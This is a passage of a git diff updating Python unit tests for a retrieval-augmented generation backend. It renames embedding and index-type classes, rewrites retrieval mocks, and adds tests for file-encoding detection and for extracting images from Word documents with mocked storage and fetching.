b/api/tests/unit_tests/core/rag/embedding/test_embedding_service.py @@ -53,7 +53,7 @@ from sqlalchemy.exc import IntegrityError from core.entities.embedding_type import EmbeddingInputType from core.model_runtime.entities.model_entities import ModelPropertyKey -from core.model_runtime.entities.text_embedding_entities import EmbeddingUsage, TextEmbeddingResult +from core.model_runtime.entities.text_embedding_entities import EmbeddingResult, EmbeddingUsage from core.model_runtime.errors.invoke import ( InvokeAuthorizationError, InvokeConnectionError, @@ -99,10 +99,10 @@ class TestCacheEmbeddingDocuments: @pytest.fixture def sample_embedding_result(self): - """Create a sample TextEmbeddingResult for testing. + """Create a sample EmbeddingResult for testing. 
Returns: - TextEmbeddingResult: Mock embedding result with proper structure + EmbeddingResult: Mock embedding result with proper structure """ # Create normalized embedding vectors (dimension 1536 for ada-002) embedding_vector = np.random.randn(1536) @@ -118,7 +118,7 @@ class TestCacheEmbeddingDocuments: latency=0.5, ) - return TextEmbeddingResult( + return EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized_vector], usage=usage, @@ -197,7 +197,7 @@ class TestCacheEmbeddingDocuments: latency=0.8, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -296,7 +296,7 @@ class TestCacheEmbeddingDocuments: latency=0.6, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=new_embeddings, usage=usage, @@ -386,7 +386,7 @@ class TestCacheEmbeddingDocuments: latency=0.5, ) - return TextEmbeddingResult( + return EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -449,7 +449,7 @@ class TestCacheEmbeddingDocuments: latency=0.5, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[valid_vector.tolist(), nan_vector], usage=usage, @@ -629,7 +629,7 @@ class TestCacheEmbeddingQuery: latency=0.3, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized], usage=usage, @@ -728,7 +728,7 @@ class TestCacheEmbeddingQuery: latency=0.3, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[nan_vector], usage=usage, @@ -793,7 +793,7 @@ class TestCacheEmbeddingQuery: latency=0.3, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized], usage=usage, @@ -873,13 +873,13 @@ class TestEmbeddingModelSwitching: latency=0.3, ) - result_ada = TextEmbeddingResult( + result_ada = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized_ada], usage=usage, ) - result_3_small = TextEmbeddingResult( + result_3_small = EmbeddingResult( model="text-embedding-3-small", embeddings=[normalized_3_small], usage=usage, @@ -953,13 +953,13 @@ class TestEmbeddingModelSwitching: latency=0.4, ) - result_openai = TextEmbeddingResult( + result_openai = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized_openai], usage=usage_openai, ) - result_cohere = TextEmbeddingResult( + result_cohere = EmbeddingResult( model="embed-english-v3.0", embeddings=[normalized_cohere], usage=usage_cohere, @@ -1042,7 +1042,7 @@ class TestEmbeddingDimensionValidation: latency=0.7, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -1095,7 +1095,7 @@ class TestEmbeddingDimensionValidation: latency=0.5, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -1148,7 +1148,7 @@ class TestEmbeddingDimensionValidation: latency=0.3, ) - result_ada = TextEmbeddingResult( + result_ada = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized_ada], usage=usage_ada, @@ -1181,7 +1181,7 @@ class TestEmbeddingDimensionValidation: latency=0.4, ) - result_cohere = TextEmbeddingResult( + result_cohere = 
EmbeddingResult( model="embed-english-v3.0", embeddings=[normalized_cohere], usage=usage_cohere, @@ -1279,7 +1279,7 @@ class TestEmbeddingEdgeCases: latency=0.1, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized], usage=usage, @@ -1322,7 +1322,7 @@ class TestEmbeddingEdgeCases: latency=1.5, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized], usage=usage, @@ -1370,7 +1370,7 @@ class TestEmbeddingEdgeCases: latency=0.5, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -1422,7 +1422,7 @@ class TestEmbeddingEdgeCases: latency=0.2, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -1478,7 +1478,7 @@ class TestEmbeddingEdgeCases: ) # Model returns embeddings for all texts - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -1546,7 +1546,7 @@ class TestEmbeddingEdgeCases: latency=0.8, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -1603,7 +1603,7 @@ class TestEmbeddingEdgeCases: latency=0.3, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized], usage=usage, @@ -1657,7 +1657,7 @@ class TestEmbeddingEdgeCases: latency=0.5, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -1757,7 +1757,7 @@ class TestEmbeddingCachePerformance: latency=0.3, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized], usage=usage, @@ -1826,7 +1826,7 @@ class TestEmbeddingCachePerformance: latency=0.5, ) - return TextEmbeddingResult( + return EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -1888,7 +1888,7 @@ class TestEmbeddingCachePerformance: latency=0.3, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized], usage=usage, diff --git a/api/tests/unit_tests/core/rag/extractor/test_helpers.py b/api/tests/unit_tests/core/rag/extractor/test_helpers.py new file mode 100644 index 0000000000..edf8735e57 --- /dev/null +++ b/api/tests/unit_tests/core/rag/extractor/test_helpers.py @@ -0,0 +1,10 @@ +import tempfile + +from core.rag.extractor.helpers import FileEncoding, detect_file_encodings + + +def test_detect_file_encodings() -> None: + with tempfile.NamedTemporaryFile(mode="w+t", suffix=".txt") as temp: + temp.write("Shared data") + temp_path = temp.name + assert detect_file_encodings(temp_path) == [FileEncoding(encoding="utf_8", confidence=0.0, language="Unknown")] diff --git a/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py b/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py index 3635e4dbf9..3203aab8c3 100644 --- a/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py +++ b/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py @@ -1,7 +1,10 @@ """Primarily used for testing merged cell scenarios""" +from types import 
SimpleNamespace + from docx import Document +import core.rag.extractor.word_extractor as we from core.rag.extractor.word_extractor import WordExtractor @@ -47,3 +50,118 @@ def test_parse_row(): extractor = object.__new__(WordExtractor) for idx, row in enumerate(table.rows): assert extractor._parse_row(row, {}, 3) == gt[idx] + + +def test_extract_images_from_docx(monkeypatch): + external_bytes = b"ext-bytes" + internal_bytes = b"int-bytes" + + # Patch storage.save to capture writes + saves: list[tuple[str, bytes]] = [] + + def save(key: str, data: bytes): + saves.append((key, data)) + + monkeypatch.setattr(we, "storage", SimpleNamespace(save=save)) + + # Patch db.session to record adds/commit + class DummySession: + def __init__(self): + self.added = [] + self.committed = False + + def add(self, obj): + self.added.append(obj) + + def commit(self): + self.committed = True + + db_stub = SimpleNamespace(session=DummySession()) + monkeypatch.setattr(we, "db", db_stub) + + # Patch config values used for URL composition and storage type + monkeypatch.setattr(we.dify_config, "FILES_URL", "http://files.local", raising=False) + monkeypatch.setattr(we.dify_config, "STORAGE_TYPE", "local", raising=False) + + # Patch UploadFile to avoid real DB models + class FakeUploadFile: + _i = 0 + + def __init__(self, **kwargs): # kwargs match the real signature fields + type(self)._i += 1 + self.id = f"u{self._i}" + + monkeypatch.setattr(we, "UploadFile", FakeUploadFile) + + # Patch external image fetcher + def fake_get(url: str): + assert url == "https://example.com/image.png" + return SimpleNamespace(status_code=200, headers={"Content-Type": "image/png"}, content=external_bytes) + + monkeypatch.setattr(we, "ssrf_proxy", SimpleNamespace(get=fake_get)) + + # A hashable internal part object with a blob attribute + class HashablePart: + def __init__(self, blob: bytes): + self.blob = blob + + def __hash__(self) -> int: # ensure it can be used as a dict key like real docx parts + return id(self) + + # Build a minimal doc object with both external and internal image rels + internal_part = HashablePart(blob=internal_bytes) + rel_ext = SimpleNamespace(is_external=True, target_ref="https://example.com/image.png") + rel_int = SimpleNamespace(is_external=False, target_ref="word/media/image1.png", target_part=internal_part) + doc = SimpleNamespace(part=SimpleNamespace(rels={"rId1": rel_ext, "rId2": rel_int})) + + extractor = object.__new__(WordExtractor) + extractor.tenant_id = "t1" + extractor.user_id = "u1" + + image_map = extractor._extract_images_from_docx(doc) + + # Returned map should contain entries for external (keyed by rId) and internal (keyed by target_part) + assert set(image_map.keys()) == {"rId1", internal_part} + assert all(v.startswith("![image](") and v.endswith("/file-preview)") for v in image_map.values()) + + # Storage should receive both payloads + payloads = {data for _, data in saves} + assert external_bytes in payloads + assert internal_bytes in payloads + + # DB interactions should be recorded + assert len(db_stub.session.added) == 2 + assert db_stub.session.committed is True + + +def test_extract_images_from_docx_uses_internal_files_url(): + """Test that INTERNAL_FILES_URL takes precedence over FILES_URL for plugin access.""" + # Test the URL generation logic directly + from configs import dify_config + + # Mock the configuration values + original_files_url = getattr(dify_config, "FILES_URL", None) + original_internal_files_url = getattr(dify_config, "INTERNAL_FILES_URL", None) + + try: + # Set 
both URLs - INTERNAL should take precedence + dify_config.FILES_URL = "http://external.example.com" + dify_config.INTERNAL_FILES_URL = "http://internal.docker:5001" + + # Test the URL generation logic (same as in word_extractor.py) + upload_file_id = "test_file_id" + + # This is the pattern we fixed in the word extractor + base_url = dify_config.INTERNAL_FILES_URL or dify_config.FILES_URL + generated_url = f"{base_url}/files/{upload_file_id}/file-preview" + + # Verify that INTERNAL_FILES_URL is used instead of FILES_URL + assert "http://internal.docker:5001" in generated_url, f"Expected internal URL, got: {generated_url}" + assert "http://external.example.com" not in generated_url, f"Should not use external URL, got: {generated_url}" + + finally: + # Restore original values + if original_files_url is not None: + dify_config.FILES_URL = original_files_url + if original_internal_files_url is not None: + dify_config.INTERNAL_FILES_URL = original_internal_files_url diff --git a/api/tests/unit_tests/core/rag/indexing/test_indexing_runner.py b/api/tests/unit_tests/core/rag/indexing/test_indexing_runner.py index d26e98db8d..c00fee8fe5 100644 --- a/api/tests/unit_tests/core/rag/indexing/test_indexing_runner.py +++ b/api/tests/unit_tests/core/rag/indexing/test_indexing_runner.py @@ -62,7 +62,7 @@ from core.indexing_runner import ( IndexingRunner, ) from core.model_runtime.entities.model_entities import ModelType -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.models.document import ChildDocument, Document from libs.datetime_utils import naive_utc_now from models.dataset import Dataset, DatasetProcessRule @@ -112,7 +112,7 @@ def create_mock_dataset_document( document_id: str | None = None, dataset_id: str | None = None, tenant_id: str | None = None, - doc_form: str = IndexType.PARAGRAPH_INDEX, + doc_form: str = IndexStructureType.PARAGRAPH_INDEX, data_source_type: str = "upload_file", doc_language: str = "English", ) -> Mock: @@ -133,8 +133,8 @@ def create_mock_dataset_document( Mock: A configured mock DatasetDocument object with all required attributes. 
Example: - >>> doc = create_mock_dataset_document(doc_form=IndexType.QA_INDEX) - >>> assert doc.doc_form == IndexType.QA_INDEX + >>> doc = create_mock_dataset_document(doc_form=IndexStructureType.QA_INDEX) + >>> assert doc.doc_form == IndexStructureType.QA_INDEX """ doc = Mock(spec=DatasetDocument) doc.id = document_id or str(uuid.uuid4()) @@ -276,7 +276,7 @@ class TestIndexingRunnerExtract: doc.id = str(uuid.uuid4()) doc.dataset_id = str(uuid.uuid4()) doc.tenant_id = str(uuid.uuid4()) - doc.doc_form = IndexType.PARAGRAPH_INDEX + doc.doc_form = IndexStructureType.PARAGRAPH_INDEX doc.data_source_type = "upload_file" doc.data_source_info_dict = {"upload_file_id": str(uuid.uuid4())} return doc @@ -616,7 +616,7 @@ class TestIndexingRunnerLoad: doc = Mock(spec=DatasetDocument) doc.id = str(uuid.uuid4()) doc.dataset_id = str(uuid.uuid4()) - doc.doc_form = IndexType.PARAGRAPH_INDEX + doc.doc_form = IndexStructureType.PARAGRAPH_INDEX return doc @pytest.fixture @@ -700,7 +700,7 @@ class TestIndexingRunnerLoad: """Test loading with parent-child index structure.""" # Arrange runner = IndexingRunner() - sample_dataset_document.doc_form = IndexType.PARENT_CHILD_INDEX + sample_dataset_document.doc_form = IndexStructureType.PARENT_CHILD_INDEX sample_dataset.indexing_technique = "high_quality" # Add child documents @@ -775,7 +775,7 @@ class TestIndexingRunnerRun: doc.id = str(uuid.uuid4()) doc.dataset_id = str(uuid.uuid4()) doc.tenant_id = str(uuid.uuid4()) - doc.doc_form = IndexType.PARAGRAPH_INDEX + doc.doc_form = IndexStructureType.PARAGRAPH_INDEX doc.doc_language = "English" doc.data_source_type = "upload_file" doc.data_source_info_dict = {"upload_file_id": str(uuid.uuid4())} @@ -802,6 +802,21 @@ class TestIndexingRunnerRun: mock_process_rule.to_dict.return_value = {"mode": "automatic", "rules": {}} mock_dependencies["db"].session.scalar.return_value = mock_process_rule + # Mock current_user (Account) for _transform + mock_current_user = MagicMock() + mock_current_user.set_tenant_id = MagicMock() + + # Setup db.session.query to return different results based on the model + def mock_query_side_effect(model): + mock_query_result = MagicMock() + if model.__name__ == "Dataset": + mock_query_result.filter_by.return_value.first.return_value = mock_dataset + elif model.__name__ == "Account": + mock_query_result.filter_by.return_value.first.return_value = mock_current_user + return mock_query_result + + mock_dependencies["db"].session.query.side_effect = mock_query_side_effect + # Mock processor mock_processor = MagicMock() mock_dependencies["factory"].return_value.init_index_processor.return_value = mock_processor @@ -1268,7 +1283,7 @@ class TestIndexingRunnerLoadSegments: doc.id = str(uuid.uuid4()) doc.dataset_id = str(uuid.uuid4()) doc.created_by = str(uuid.uuid4()) - doc.doc_form = IndexType.PARAGRAPH_INDEX + doc.doc_form = IndexStructureType.PARAGRAPH_INDEX return doc @pytest.fixture @@ -1316,7 +1331,7 @@ class TestIndexingRunnerLoadSegments: """Test loading segments for parent-child index.""" # Arrange runner = IndexingRunner() - sample_dataset_document.doc_form = IndexType.PARENT_CHILD_INDEX + sample_dataset_document.doc_form = IndexStructureType.PARENT_CHILD_INDEX # Add child documents for doc in sample_documents: @@ -1413,7 +1428,7 @@ class TestIndexingRunnerEstimate: tenant_id=tenant_id, extract_settings=extract_settings, tmp_processing_rule={"mode": "automatic", "rules": {}}, - doc_form=IndexType.PARAGRAPH_INDEX, + doc_form=IndexStructureType.PARAGRAPH_INDEX, ) diff --git 
a/api/tests/unit_tests/core/rag/rerank/test_reranker.py b/api/tests/unit_tests/core/rag/rerank/test_reranker.py index 4912884c55..ebe6c37818 100644 --- a/api/tests/unit_tests/core/rag/rerank/test_reranker.py +++ b/api/tests/unit_tests/core/rag/rerank/test_reranker.py @@ -26,6 +26,18 @@ from core.rag.rerank.rerank_type import RerankMode from core.rag.rerank.weight_rerank import WeightRerankRunner +def create_mock_model_instance(): + """Create a properly configured mock ModelInstance for reranking tests.""" + mock_instance = Mock(spec=ModelInstance) + # Setup provider_model_bundle chain for check_model_support_vision + mock_instance.provider_model_bundle = Mock() + mock_instance.provider_model_bundle.configuration = Mock() + mock_instance.provider_model_bundle.configuration.tenant_id = "test-tenant-id" + mock_instance.provider = "test-provider" + mock_instance.model = "test-model" + return mock_instance + + class TestRerankModelRunner: """Unit tests for RerankModelRunner. @@ -37,10 +49,23 @@ class TestRerankModelRunner: - Metadata preservation and score injection """ + @pytest.fixture(autouse=True) + def mock_model_manager(self): + """Auto-use fixture to patch ModelManager for all tests in this class.""" + with patch("core.rag.rerank.rerank_model.ModelManager") as mock_mm: + mock_mm.return_value.check_model_support_vision.return_value = False + yield mock_mm + @pytest.fixture def mock_model_instance(self): """Create a mock ModelInstance for reranking.""" mock_instance = Mock(spec=ModelInstance) + # Setup provider_model_bundle chain for check_model_support_vision + mock_instance.provider_model_bundle = Mock() + mock_instance.provider_model_bundle.configuration = Mock() + mock_instance.provider_model_bundle.configuration.tenant_id = "test-tenant-id" + mock_instance.provider = "test-provider" + mock_instance.model = "test-model" return mock_instance @pytest.fixture @@ -803,7 +828,7 @@ class TestRerankRunnerFactory: - Parameters are forwarded to runner constructor """ # Arrange: Mock model instance - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() # Act: Create runner via factory runner = RerankRunnerFactory.create_rerank_runner( @@ -865,7 +890,7 @@ class TestRerankRunnerFactory: - String values are properly matched """ # Arrange: Mock model instance - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() # Act: Create runner using enum value runner = RerankRunnerFactory.create_rerank_runner( @@ -886,6 +911,13 @@ class TestRerankIntegration: - Real-world usage scenarios """ + @pytest.fixture(autouse=True) + def mock_model_manager(self): + """Auto-use fixture to patch ModelManager for all tests in this class.""" + with patch("core.rag.rerank.rerank_model.ModelManager") as mock_mm: + mock_mm.return_value.check_model_support_vision.return_value = False + yield mock_mm + def test_model_reranking_full_workflow(self): """Test complete model-based reranking workflow. 
@@ -895,7 +927,7 @@ class TestRerankIntegration: - Top results are returned correctly """ # Arrange: Create mock model and documents - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ @@ -951,7 +983,7 @@ class TestRerankIntegration: - Normalization is consistent """ # Arrange: Create mock model with various scores - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ @@ -991,6 +1023,13 @@ class TestRerankEdgeCases: - Concurrent reranking scenarios """ + @pytest.fixture(autouse=True) + def mock_model_manager(self): + """Auto-use fixture to patch ModelManager for all tests in this class.""" + with patch("core.rag.rerank.rerank_model.ModelManager") as mock_mm: + mock_mm.return_value.check_model_support_vision.return_value = False + yield mock_mm + def test_rerank_with_empty_metadata(self): """Test reranking when documents have empty metadata. @@ -1000,7 +1039,7 @@ class TestRerankEdgeCases: - Empty metadata documents are processed correctly """ # Arrange: Create documents with empty metadata - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ @@ -1046,7 +1085,7 @@ class TestRerankEdgeCases: - Score comparison logic works at boundary """ # Arrange: Create mock with various scores including negatives - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ @@ -1082,7 +1121,7 @@ class TestRerankEdgeCases: - No overflow or precision issues """ # Arrange: All documents with perfect scores - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ @@ -1117,7 +1156,7 @@ class TestRerankEdgeCases: - Content encoding is preserved """ # Arrange: Documents with special characters - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ @@ -1159,7 +1198,7 @@ class TestRerankEdgeCases: - Content is not truncated unexpectedly """ # Arrange: Documents with very long content - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() long_content = "This is a very long document. 
" * 1000 # ~30,000 characters mock_rerank_result = RerankResult( @@ -1196,7 +1235,7 @@ class TestRerankEdgeCases: - All documents are processed correctly """ # Arrange: Create 100 documents - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() num_docs = 100 # Create rerank results for all documents @@ -1287,7 +1326,7 @@ class TestRerankEdgeCases: - Documents can still be ranked """ # Arrange: Empty query - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ @@ -1325,6 +1364,13 @@ class TestRerankPerformance: - Score calculation optimization """ + @pytest.fixture(autouse=True) + def mock_model_manager(self): + """Auto-use fixture to patch ModelManager for all tests in this class.""" + with patch("core.rag.rerank.rerank_model.ModelManager") as mock_mm: + mock_mm.return_value.check_model_support_vision.return_value = False + yield mock_mm + def test_rerank_batch_processing(self): """Test that documents are processed in a single batch. @@ -1334,7 +1380,7 @@ class TestRerankPerformance: - Efficient batch processing """ # Arrange: Multiple documents - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[RerankDocument(index=i, text=f"Doc {i}", score=0.9 - i * 0.1) for i in range(5)], @@ -1435,6 +1481,13 @@ class TestRerankErrorHandling: - Error propagation """ + @pytest.fixture(autouse=True) + def mock_model_manager(self): + """Auto-use fixture to patch ModelManager for all tests in this class.""" + with patch("core.rag.rerank.rerank_model.ModelManager") as mock_mm: + mock_mm.return_value.check_model_support_vision.return_value = False + yield mock_mm + def test_rerank_model_invocation_error(self): """Test handling of model invocation errors. @@ -1444,7 +1497,7 @@ class TestRerankErrorHandling: - Error context is preserved """ # Arrange: Mock model that raises exception - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_model_instance.invoke_rerank.side_effect = RuntimeError("Model invocation failed") documents = [ @@ -1470,7 +1523,7 @@ class TestRerankErrorHandling: - Invalid results don't corrupt output """ # Arrange: Rerank result with invalid index - mock_model_instance = Mock(spec=ModelInstance) + mock_model_instance = create_mock_model_instance() mock_rerank_result = RerankResult( model="bge-reranker-base", docs=[ diff --git a/api/tests/unit_tests/core/rag/retrieval/test_dataset_retrieval.py b/api/tests/unit_tests/core/rag/retrieval/test_dataset_retrieval.py index 0163e42992..affd6c648f 100644 --- a/api/tests/unit_tests/core/rag/retrieval/test_dataset_retrieval.py +++ b/api/tests/unit_tests/core/rag/retrieval/test_dataset_retrieval.py @@ -425,15 +425,15 @@ class TestRetrievalService: # ==================== Vector Search Tests ==================== - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_vector_search_basic(self, mock_get_dataset, mock_embedding_search, mock_dataset, sample_documents): + def test_vector_search_basic(self, mock_get_dataset, mock_retrieve, mock_dataset, sample_documents): """ Test basic vector/semantic search functionality. 
This test validates the core vector search flow: 1. Dataset is retrieved from database - 2. embedding_search is called via ThreadPoolExecutor + 2. _retrieve is called via ThreadPoolExecutor 3. Documents are added to shared all_documents list 4. Results are returned to caller @@ -447,28 +447,28 @@ class TestRetrievalService: # Set up the mock dataset that will be "retrieved" from database mock_get_dataset.return_value = mock_dataset - # Create a side effect function that simulates embedding_search behavior - # In the real implementation, embedding_search: - # 1. Gets the dataset - # 2. Creates a Vector instance - # 3. Calls search_by_vector with embeddings - # 4. Extends all_documents with results - def side_effect_embedding_search( + # Create a side effect function that simulates _retrieve behavior + # _retrieve modifies the all_documents list in place + def side_effect_retrieve( flask_app, - dataset_id, - query, - top_k, - score_threshold, - reranking_model, - all_documents, retrieval_method, - exceptions, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): - """Simulate embedding_search adding documents to the shared list.""" - all_documents.extend(sample_documents) + """Simulate _retrieve adding documents to the shared list.""" + if all_documents is not None: + all_documents.extend(sample_documents) - mock_embedding_search.side_effect = side_effect_embedding_search + mock_retrieve.side_effect = side_effect_retrieve # Define test parameters query = "What is Python?" # Natural language query @@ -481,7 +481,7 @@ class TestRetrievalService: # 1. Check if query is empty (early return if so) # 2. Get the dataset using _get_dataset # 3. Create ThreadPoolExecutor - # 4. Submit embedding_search task + # 4. Submit _retrieve task # 5. Wait for completion # 6. Return all_documents list results = RetrievalService.retrieve( @@ -502,15 +502,13 @@ class TestRetrievalService: # Verify documents maintain their scores (highest score first in sample_documents) assert results[0].metadata["score"] == 0.95, "First document should have highest score from sample_documents" - # Verify embedding_search was called exactly once + # Verify _retrieve was called exactly once # This confirms the search method was invoked by ThreadPoolExecutor - mock_embedding_search.assert_called_once() + mock_retrieve.assert_called_once() - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_vector_search_with_document_filter( - self, mock_get_dataset, mock_embedding_search, mock_dataset, sample_documents - ): + def test_vector_search_with_document_filter(self, mock_get_dataset, mock_retrieve, mock_dataset, sample_documents): """ Test vector search with document ID filtering. 
@@ -522,21 +520,25 @@ class TestRetrievalService: mock_get_dataset.return_value = mock_dataset filtered_docs = [sample_documents[0]] - def side_effect_embedding_search( + def side_effect_retrieve( flask_app, - dataset_id, - query, - top_k, - score_threshold, - reranking_model, - all_documents, retrieval_method, - exceptions, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): - all_documents.extend(filtered_docs) + if all_documents is not None: + all_documents.extend(filtered_docs) - mock_embedding_search.side_effect = side_effect_embedding_search + mock_retrieve.side_effect = side_effect_retrieve document_ids_filter = [sample_documents[0].metadata["document_id"]] # Act @@ -552,12 +554,12 @@ class TestRetrievalService: assert len(results) == 1 assert results[0].metadata["doc_id"] == "doc1" # Verify document_ids_filter was passed - call_kwargs = mock_embedding_search.call_args.kwargs + call_kwargs = mock_retrieve.call_args.kwargs assert call_kwargs["document_ids_filter"] == document_ids_filter - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_vector_search_empty_results(self, mock_get_dataset, mock_embedding_search, mock_dataset): + def test_vector_search_empty_results(self, mock_get_dataset, mock_retrieve, mock_dataset): """ Test vector search when no results match the query. @@ -567,8 +569,8 @@ class TestRetrievalService: """ # Arrange mock_get_dataset.return_value = mock_dataset - # embedding_search doesn't add anything to all_documents - mock_embedding_search.side_effect = lambda *args, **kwargs: None + # _retrieve doesn't add anything to all_documents + mock_retrieve.side_effect = lambda *args, **kwargs: None # Act results = RetrievalService.retrieve( @@ -583,9 +585,9 @@ class TestRetrievalService: # ==================== Keyword Search Tests ==================== - @patch("core.rag.datasource.retrieval_service.RetrievalService.keyword_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_keyword_search_basic(self, mock_get_dataset, mock_keyword_search, mock_dataset, sample_documents): + def test_keyword_search_basic(self, mock_get_dataset, mock_retrieve, mock_dataset, sample_documents): """ Test basic keyword search functionality. 
@@ -597,12 +599,25 @@ class TestRetrievalService: # Arrange mock_get_dataset.return_value = mock_dataset - def side_effect_keyword_search( - flask_app, dataset_id, query, top_k, all_documents, exceptions, document_ids_filter=None + def side_effect_retrieve( + flask_app, + retrieval_method, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, + document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): - all_documents.extend(sample_documents) + if all_documents is not None: + all_documents.extend(sample_documents) - mock_keyword_search.side_effect = side_effect_keyword_search + mock_retrieve.side_effect = side_effect_retrieve query = "Python programming" top_k = 3 @@ -618,7 +633,7 @@ class TestRetrievalService: # Assert assert len(results) == 3 assert all(isinstance(doc, Document) for doc in results) - mock_keyword_search.assert_called_once() + mock_retrieve.assert_called_once() @patch("core.rag.datasource.retrieval_service.RetrievalService.keyword_search") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") @@ -1147,11 +1162,9 @@ class TestRetrievalService: # ==================== Metadata Filtering Tests ==================== - @patch("core.rag.datasource.retrieval_service.RetrievalService.embedding_search") + @patch("core.rag.datasource.retrieval_service.RetrievalService._retrieve") @patch("core.rag.datasource.retrieval_service.RetrievalService._get_dataset") - def test_vector_search_with_metadata_filter( - self, mock_get_dataset, mock_embedding_search, mock_dataset, sample_documents - ): + def test_vector_search_with_metadata_filter(self, mock_get_dataset, mock_retrieve, mock_dataset, sample_documents): """ Test vector search with metadata-based document filtering. @@ -1166,21 +1179,25 @@ class TestRetrievalService: filtered_doc = sample_documents[0] filtered_doc.metadata["category"] = "programming" - def side_effect_embedding( + def side_effect_retrieve( flask_app, - dataset_id, - query, - top_k, - score_threshold, - reranking_model, - all_documents, retrieval_method, - exceptions, + dataset, + query=None, + top_k=4, + score_threshold=None, + reranking_model=None, + reranking_mode="reranking_model", + weights=None, document_ids_filter=None, + attachment_id=None, + all_documents=None, + exceptions=None, ): - all_documents.append(filtered_doc) + if all_documents is not None: + all_documents.append(filtered_doc) - mock_embedding_search.side_effect = side_effect_embedding + 